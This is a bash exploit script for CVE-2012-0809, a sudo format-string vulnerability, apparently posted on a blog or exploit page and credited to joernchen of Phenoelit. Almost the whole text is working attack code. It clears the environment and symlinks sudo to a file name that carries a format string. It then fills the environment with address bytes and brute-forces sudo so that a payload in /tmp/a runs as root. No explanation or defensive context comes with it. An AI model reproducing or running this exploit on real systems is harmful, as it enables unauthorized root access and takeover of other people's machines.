CVE-2012-0809 Exploit
#!/bin/bash
# CVE-2012-0809 exploit
# joernchen of Phenoelit's version
# Payload to be executed goes to /tmp/a (might be a shell script)
cd /tmp
/bin/echo '-> Clearing ENV'
for i in `env |cut -f1 -d "="` ;do unset $i;done
/bin/echo '-> Creating symlink'
/bin/ln -s /usr/bin/sudo ./%134520134x%900\$n
/bin/echo '-> Setting ENV'
export AAA=AAAA;
export A;
for i in `/usr/bin/seq 1 5000`; do
export A=$A`echo -n -e '\x24\x83\x05\x08'`;
done;
/bin/echo '-> Now a little Brute-Force'
while true ; do SUDO_ASKPASS=/tmp/a ./%134520134x%900\$n -D9 -A id 2>/dev/null ; if [[ "$?" == "1" ]]; then break ;fi ; done
/bin/echo '-> Cleaning up'
/bin/rm /tmp/%134520134x%900\$n
Read other posts